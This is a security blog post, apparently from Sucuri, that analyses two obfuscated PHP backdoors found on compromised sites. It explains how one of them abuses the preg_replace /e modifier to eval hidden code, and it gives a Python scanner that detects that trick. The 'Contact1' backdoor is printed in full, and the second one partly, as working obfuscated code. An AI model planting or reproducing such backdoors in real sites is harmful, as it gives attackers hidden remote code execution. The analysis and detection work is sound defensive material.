Backdoor: Contact1

Magno (from our support team) found this pretty backdoor on a compromised site. As we keep saying, just searching for eval + base64_decode won't cut it anymore.

If you enjoy decoding backdoors and are looking for a job, please try this one and send the results to dcid@sucuri.net 🙂

$hlD='iDK'.sGVMQ7;$Uh='mw~g~{~te}o'&movg.'~{'.jwuko;$NWAAkzdZp3E=')!@'|"*\$B";'gqHK'.
     'S0q?E,P;D';$Sfp4z_wg='[@e+v8'^'xd%n8^';$G99ZRs=rqyM_.'|'.ceRQ.'.bJC'|'Cr-!J=4'.
     '" Olu& ';$hEg='$7.5XB; "D!5'|'!86!jP8
"P=*';$tUCPwKkMT9='4~j{'.bsmrr.'^`s'^#M'.
     'a31)GS3")';$ABFU=GvinYpovtk."}iN_?w=f}>}nhp/=YG+^]`".dnmw&'trM/u?wkV:}[Rw/'.
     's}&3:?'.hmYo.'}'.iRw_e9vnMw;$YhV="/[eU_"&'>{wu]';$QwdOlaBF='.'&n;$tD='^mw'&/*'.
     '+r7wsL*/fAw;$lc2dKfnyr='tau}l~'&ootgkv;$uB785Xk0='vb)7|'^'>6}g#';$LcLj="9"^/*'.
     '+_4MR0t<*/x;$_B=w&c;$oNP0EeIWkLS=syu&wio;$iDuSaXky6Y=LTUT_X&z_TY_.'{';'ODO4Zg'.
     'mOZLb{,~s'^'a,>x!:';$g0Vp="?("^qn;$bfv=G|H;$FPMf=('~ew}nw'.
     '|}u}o'&'~gw}nw~|g{n')&$Uh;$NRKZ54=$tD^$NWAAkzdZp3E;$EJzYkUOU=$Sfp4z_wg|/*tsRq'.
     'Rm-bWx~*/$lc2dKfnyr;$WrVZ9W=$G99ZRs&(JaLlV4ruBUSuko|'kLl*'._QqH2O4.'@oj');'A4'.
     '7rL';$ek1OUNY=$hEg^$tUCPwKkMT9;$E5TeI6U=('%1x_r^1'.Z0iL.'~'.huuslyV.#WWqJtW7c'.
     '~]3.>'.lVz7Vm.')Z>){~'&'as~E:~3'.W6oM.'>4'.leKeqON.'{|g}^'.Txvh.'|)z>{}J')^/*'.
     '&*/$ABFU;if($FPMf($NRKZ54($EJzYkUOU($uB785Xk0.$LcLj)),(lTRiTPX.'@'.XZIU.#rkpu'.
     ']jtb<'.W2ZU^'Zdf[`an"oi('.ehSFZ.'^'.oP8f).('
""1b"088b'|"46B(".D4400b).$_B))/*'.
     '(8=*/exit;$WrVZ9W($ek1OUNY,$YhV.$QwdOlaBF.$oNP0EeIWkLS,$EJzYkUOU(/*pu9nkGmceX'.
     'M9La;DNb,**/$iDuSaXky6Y.$JKDCVF98X.$g0Vp.$bfv),$E5TeI6U);#~CTu8z)O?=2?y]!HKZ'.
     'nf(vKmSV>e_Za[d|qeA)hw_baI^^@Z}N!rPq5tBV^u';

Yes, that's all for the backdoor.

Backdoor: preg_replace

Another interesting backdoor:

<?php $ncww = "e/*./"; preg_replace(strrev($ncww),"\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'rVkJc+JG0/4rxLW1Nl8cr0YHoHi1Lz7AxmvwawwY2GxRgMQpjkJiOTb737+e7pmROLxJKm8SS2Km55m+u2cy7CXOfuktp91wOJu2vPUwCIOz00LhNJlMfE/IiUShcPZumPz+ru1cLRbtzdnpaeLitPJqp9qva/4ZNF4y2uPoin/3P9/xV+lbp87f1/wx4A/3zuevYeeuyt/pQo6/WOWlWu3zr6cbc/XEPzbX9farNeafHcPdFnJWtXDbWBZvxs7pOW7d1fkzP+HPJn/UbP4MO3rZB5KOcY1bdfjDt4f81aiX8FcTufM3QNa+559...

You may not be aware of it, but the preg_replace function with the e modifier allows full code execution (eval). Here strrev("e/*./") yields the pattern "/.*/e", which matches everything and carries that modifier. When you decode the hex characters of the second argument, you get eval(gzinflate(base64_decode(, which runs all the code in the long block of characters inside the preg_replace.
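A small scanner for this pattern, added here as an example (not Sucuri's tool): it resolves strrev()'d pattern variables, reads the PCRE modifiers, and decodes the \xHH replacement so the hidden eval(gzinflate(base64_decode( is visible. The sample input is constructed to mirror the backdoor above, with a placeholder where the page's payload is truncated.

```python
import re

# Constructed sample modelled on the preg_replace backdoor quoted above; the real
# payload is truncated on the page, so a placeholder stands in for it.
SAMPLE = ('<?php $ncww = "e/*./"; preg_replace(strrev($ncww),'
          '"\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6C\\x61\\x74\\x65'
          '\\x28\\x62\\x61\\x73\\x65\\x36\\x34\\x5F\\x64\\x65\\x63\\x6F\\x64\\x65'
          '\\x28\'PAYLOAD_PLACEHOLDER\'))", ""); ?>')

# $var = "literal"; or $var = 'literal';
ASSIGN_RE = re.compile(r'(\$\w+)\s*=\s*(?:"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\')\s*;')
# preg_replace( [strrev(] <variable or string literal> [)] , <string literal>
CALL_RE = re.compile(
    r'preg_replace\s*\(\s*(strrev\s*\(\s*)?'            # optional strrev() wrapper
    r'(\$\w+|"(?:[^"\\]|\\.)*"|\'(?:[^\'\\]|\\.)*\')'   # pattern argument
    r'\s*\)?\s*,\s*'
    r'("(?:[^"\\]|\\.)*"|\'(?:[^\'\\]|\\.)*\')', re.S)  # replacement argument

def php_unescape(s):
    """Decode the \\xHH escapes that PHP expands inside double-quoted strings."""
    return re.sub(r'\\x([0-9A-Fa-f]{1,2})', lambda m: chr(int(m.group(1), 16)), s)

def regex_modifiers(pattern):
    """Return the modifier letters after the closing delimiter of a PCRE pattern string."""
    if not pattern:
        return ''
    open_d = pattern[0]
    close_d = {'(': ')', '[': ']', '{': '}', '<': '>'}.get(open_d, open_d)
    end = pattern.rfind(close_d)
    return pattern[end + 1:] if end > 0 else ''

def find_preg_replace_e(src):
    """Return (resolved_pattern, decoded_replacement) for each preg_replace using /e."""
    literals = {}
    for m in ASSIGN_RE.finditer(src):
        literals[m.group(1)] = m.group(2) if m.group(2) is not None else m.group(3)
    hits = []
    for m in CALL_RE.finditer(src):
        wrapped, arg, repl = m.group(1), m.group(2), m.group(3)
        pattern = literals.get(arg, '') if arg.startswith('$') else arg[1:-1]
        if wrapped:
            pattern = pattern[::-1]          # undo strrev()
        if 'e' in regex_modifiers(pattern):
            decoded = php_unescape(repl[1:-1]) if repl[0] == '"' else repl[1:-1]
            hits.append((pattern, decoded))
    return hits

if __name__ == '__main__':
    for pattern, repl in find_preg_replace_e(SAMPLE):
        print('preg_replace /e found: pattern=%r replacement=%r' % (pattern, repl[:48]))
```

The e modifier was deprecated in PHP 5.5 and removed in PHP 7.0, so on current PHP this call only raises a warning, but the strrev and hex-escape tricks it hides behind are still a reliable sign that a file deserves a closer look.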